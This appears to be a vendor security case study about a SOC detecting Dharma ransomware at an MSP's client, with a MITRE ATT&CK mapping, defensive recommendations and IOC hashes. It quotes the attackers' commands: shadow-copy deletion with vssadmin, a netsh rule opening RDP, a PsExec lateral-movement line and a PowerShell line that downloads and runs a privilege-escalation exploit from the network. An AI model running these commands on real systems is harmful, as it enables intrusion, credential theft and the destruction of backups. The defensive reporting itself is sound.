MSP Detects Ransomware at Service Industry Client

The Network: A well-known Managed Service Provider (MSP) specializing in infrastructure monitoring and management, disaster recovery, and security monitoring services uses Netsurion’s EventTracker to provide SOC-as-a-Service (SOCaaS) capabilities to their end clients. The affected end client is in the services industry.

The Expectation: Prevention defenses, such as anti-virus (AV) software, are working and comprehensive monitoring and alerting is in place to rapidly detect threats that slip through the prevention layer. EventTracker Security Information and Event Management (SIEM) services, advanced endpoint protection, and behavior analytics deliver added protection for the MSP’s clients. Rapid ransomware detection is crucial as it remains costly and time consuming to defend and mitigate.

The Catch: Detection of Dharma ransomware, a variant of the CrySIS ransomware family. The EventTracker SOC (Security Operations Center) detected malicious process hashes on the host of the MSP’s client, where these hashes matched Indicators of Compromise of Dharma ransomware. The attackers stole user credentials of the client company via a brute-force attack or by tricking the user to enter credentials on a malicious URL. The attack was initiated by logging into the system from IP address 213.152.161.85, which uninstalled the AV, followed by a series of malicious process executions and lateral movement activity through Remote Desktop Protocol (RDP). Finally, the attackers cleared audit and other system logs to try unsuccessfully to evade detection.

The Find: By combining SIEM and EDR technologies driven by our ISO-certified SOC, Netsurion detected many unknown (not seen previously) MD5 hashes where the hash reputation was poor. The detected hashes were matching to that of hashes used to launch Dharma ransomware. In use since 2016, threat actors behind Dharma ransomware continue to evolve and release new variants while using multiple attack vectors and decoy applications. Dharma ransomware leverages RDP on default port 3389 to connect to systems through stolen and compromised user credentials that allow hackers to gain access to sensitive systems and data. The cyber attackers used the tactics, techniques, and procedures (TTPs) below to infect the service industry client with ransomware.

The EventTracker SOC observed the following attack sequence on the Client host:

  1. Successful login to connect to system from blacklisted IP-213.152.161.85, originating from The Netherlands
  2. Installed of Revo Uninstaller software to uninstall the anti-virus program “Webroot SecureAnywhere”
  3. Installed of malicious .exe (IObitUnlocker.exe) for which the EventTracker generates new software install alert
  4. Downloaded malicious file in C:\Users\<compromised Username>\Downloads\..
  5. Used an Advanced Port Scanner to invoke mstsc.exe, to detect listening host on port 3389
  6. Deleted Windows backups by running the vssadmin delete shadows /all
  7. Downloaded many malicious files to location C:\Users\<compromised Username>\Downloads\driver
  8. EventTracker SIEM with built-in EDR triggered an alert upon detection of the malicious file
  9. Implemented critical software tools “mimilove.exe” and “mimikatz.exe” to gather password dumps
  10. Used netsh command through command line to allow inbound RDP connections
    Command Line: netsh  advfirewall firewall add rule name="allow RemoteDesktop" dir=in protocol=TCP localport=3389 action=allow
  11. Attempted to login to multiple hosts with use of remote administration tools (PsExec.exe)
    Command line: C:\PS\PsExec.exe  \\10.0.0.55 -u <domainname>\<Username> -p <password> cmd
  12. Executed PowerShell to access “github” to exploit the vulnerability in IKE and AuthIP IPsec
    Command line: IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/itm4n/Ikeext-Privesc/master/Ikeext-Privesc.ps1''); Invoke-IkeextCheck -Verbose; Invoke-IkeextExploit -Verbose
  13. Set the Microsoft Windows firewall to an OFF state, by the use of netsh command
  14. Attempted to clear audit logs from the host to avoid traces of infection and to escape detection
Tactics in MITRE ATT&CK Technique Name in MITRE ATT&CK Commands/Processes Matching the Tactics and Techniques in MITRE Brief Description ID
Impact Inhibit system recovery vssadmin delete shadows /all vssadmin.exe can be used to delete all volume shadow copies on a system T1490
Credential access Credential dumping mimikatz.exe & mimilove.exe Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords T1003
Defense evasion Disabling security tools netsh.exe netsh can be used to disable/enable local firewall settings T1089
Execution Service execution PsExec.exe Adversaries may execute a binary, command, or script via a method that interacts with Windows services. T1035
Execution PowerShell Powershell.exe Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer. PowerShell can also be used to download and run executables from the internet, which can be executed from disk or in memory without touching disk. T1086

The Fix: The EventTracker SOC promptly alerted the MSP upon the detection. All identified malicious hashes and IP addresses were immediately moved to an unsafe list for process termination on the infected system. The collected hashes were then added to the EventTracker Threat Center repository to protect other customers and MSP’s clients. The SOC analysts also assessed whether other devices on the network were also infected. The comprehensive 24/7 monitoring quickly detected the ransomware threat. Finally, mapping the actual steps taken by the threat actor to the MITRE ATT&CK framework provides a holistic view of the risk, the Dharma adversaries, and how to effectively fight against these mutating threats.

The Lesson: The EventTracker SOC provided remediation guidelines for the MSP to share with their end-user client. Recommendations to defend against ransomware attacks include:

  • Organizations must implement strong password policies as well as least privilege policy (limit access to those with a true need to know)
  • RDP: limit RDP access to specific IP addresses, potentially re-number the default port 3389 to try and evade scanning detection, and turn off Remote Desktop Services if they are not needed
  • Educate users at all levels regarding cybersecurity best practices, especially on phishing emails and social engineered threats
  • Regularly perform data backup in case information recovery is needed as a last resort
  • Implement comprehensive monitoring and alerting of servers and workstations for advanced threat detection
File Name File Path MD5 Hash
IObitUnlocker.exe C:\Program Files\IObit\IObit Unlocker\IObitUnlocker.exe D166261F5138AB859F03813992C37687
PS.exe C:\Users\frankjr\Downloads\PS.exe 54daad58cce5003bee58b28a4f465f49
kprocesshacker.sys C:\Program Files\Process Hacker 2\kprocesshacker.sys 6365FE1D37545C71CBE2719AC7831BDD
NS.exe C:\Users\frankjr\Downloads\driver\NS.exe 869420f42c9448924f935e5c1e2d9949
del32.exe C:\Users\frankjr\Downloads\driver\del32.exe 902B500F4FA08C9741695931A6ACAD3C
ph_exec.exe C:\Users\frankjr\Downloads\driver\ph_exec\ph_exec.exe 3f20caeef00bf0ca5d3d0537e9929692
NS2.exe C:\Users\frankjr\Downloads\driver\NS2.exe 597DE376B1F80C06D501415DD973DCEC
ikea32.exe C:\Users\frankjr\Downloads\driver\ikea32.exe 649BA005BF09C1A0C4EE1100060997A6
log32.exe C:\Users\xxxx\Downloads\driver\log32.exe 2719851205efad370b74144332e977f2
zam32.exe C:\Users\xxxx\Downloads\driver\zam32.exe  33f34f691bbd4d19a801aa36f053ed2b 
del32.exe C:\Users\frankjr\Downloads\driver\del32.exe 902b500f4fa08c9741695931a6acad3c